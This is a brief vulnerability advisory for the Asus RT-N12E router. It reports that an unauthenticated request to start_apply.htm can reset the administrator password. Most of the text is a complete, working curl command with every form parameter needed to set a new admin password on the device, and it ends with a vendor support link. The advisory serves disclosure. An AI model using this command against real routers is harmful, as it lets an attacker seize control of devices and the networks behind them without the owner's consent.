Asus RT-N12E is affected by an incorrect access control vulnerability, through system.asp/start_apply.htm an attacker can change the administrator password without any authentication.
The vulnerability was exploited using the curl:
curl "http://router/start_apply.htm" --data "current_page=system.asp&typeForm=formSystemSetup&submit-url=%2
Fsystem.asp&action_mode=Restart_MISC&flag=nodetect&preferred_lang=BR&NTP_SYSTIMEZONE=GMT%2B02%3A00&newpass=NEWPASSWORD&con
fpass=NEWPASSWORD&logServer=&timeZone=-2+7&ntpServerIp=pool.ntp.org" --compressed --insecure
https://www.asus.com/us/SupportOnly/RT-N12E/HelpDesk_Knowledge/